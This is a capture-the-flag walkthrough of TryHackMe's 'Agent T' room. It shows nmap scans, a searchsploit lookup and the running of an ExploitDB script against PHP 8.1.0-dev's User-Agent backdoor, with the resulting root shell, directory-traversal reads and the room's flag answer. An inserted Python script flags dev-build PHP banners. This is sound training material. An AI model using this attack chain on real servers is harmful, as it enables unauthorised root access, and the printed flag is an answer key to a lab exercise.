In this walkthrough, we will be going through the Agent T room from TryHackMe. This room is rated as Easy on the platform and consists of exploiting a PHP server using a known exploit to get the required flag. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Agent T VM |
| IP address | 10.10.55.180 |
| Difficulty | Easy |
| Objective | Agent T uncovered this website, which looks innocent enough, but something seems off about how the server responds… |
Enumeration:
- I first started with an all-ports scan using timing template 4 and found only port 80 open. Then I ran another scan to detect the service version of the running web server and found that it is a PHP server running PHP version 8.1.0-dev. Pretty interesting.
sudo nmap -sS -p- -T4 10.10.55.180
nmap -sV -p 80 10.10.55.180
- Found nothing worthwhile in the application running on port 80. It is more of a rabbit hole, and I fell into it too and wasted a lot of time.
- Next, I searched for any known exploits and got a User Agent RCE exploit. Bingo!
searchsploit PHP 8.1.0
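An added example (not part of the original walkthrough): the defender-side counterpart of the version scan above, flagging web servers whose response headers advertise a pre-release PHP build such as 8.1.0-dev. It assumes the version leaks through the `X-Powered-By` or `Server` header; the function names and sample responses are constructed for illustration.

```python
import re

# Matches a PHP version token such as "PHP/8.1.0-dev" or "PHP/8.2.12".
PHP_TOKEN = re.compile(
    r"PHP[/ ](\d+\.\d+\.\d+)(?:-?(dev|alpha\d*|beta\d*|rc\d*))?", re.IGNORECASE
)
# Assumption: these are the headers that disclose the PHP version, if any does.
BANNER_HEADERS = ("x-powered-by", "server")

def parse_headers(raw_response: str) -> dict:
    """Parse the header block of a raw HTTP response into a lower-cased dict."""
    head = raw_response.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def audit_php_banner(raw_response: str) -> dict:
    """Report the advertised PHP version and whether it is a pre-release build."""
    headers = parse_headers(raw_response)
    for name in BANNER_HEADERS:
        match = PHP_TOKEN.search(headers.get(name, ""))
        if match:
            version, tag = match.group(1), (match.group(2) or "").lower()
            return {
                "header": name,
                "version": version + (f"-{tag}" if tag else ""),
                "prerelease": bool(tag),
                # The build this room's server reports, which has a known RCE exploit.
                "flagged": version == "8.1.0" and tag == "dev",
            }
    return {"header": None, "version": None, "prerelease": False, "flagged": False}

# Constructed sample responses (not captured from the room).
SAMPLES = {
    "dev-build": "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\n"
                 "Content-Type: text/html\r\n\r\n<html></html>",
    "release": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.57 (Debian)\r\n"
               "X-Powered-By: PHP/8.2.12\r\n\r\n",
    "no-banner": "HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\n",
}

if __name__ == "__main__":
    for label, response in SAMPLES.items():
        print(label, audit_php_banner(response))
```

A development build answering on a reachable port is worth an alert on its own, independent of any specific exploit.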
Initial Access:
- Used the exploit from Exploit DB and fired it at our target, which gave me a root shell. Nothing better than that.
wh1terose@fsociety:~/CTF/TryHackme/AgentT$ python3 49933.py
Enter the full host url: http://10.10.55.180
Interactive shell is opened on http://10.10.55.180
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)
Getting the Flag:
- The shell we have here has some restrictions: it did not let me move freely around the filesystem and constrained me to the current directory. I overcame this limitation by exploiting directory traversal in the shell and read the contents of the flag file.
$ ls ../../../../../../../
bin boot dev etc flag.txt home -- snipped --
$ cat ../../../../../../../flag.txt
flag{4127d0530abf16d6d23973e3df8dbecb}
$
Task 1 – Find The Flag
Question 1 – What is the flag?
flag{4127d0530abf16d6d23973e3df8dbecb}
Conclusion:
So that was “Agent T” for you. We first started with an nmap scan and found port 80 open with a PHP web server running, specifically PHP version 8.1.0-dev. We enumerated the website running on port 80 and found nothing useful. So, we searched for known exploits for the PHP server version using searchsploit and got a hit for a User Agent RCE exploit. We used it to get root access on the system and captured the flag. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.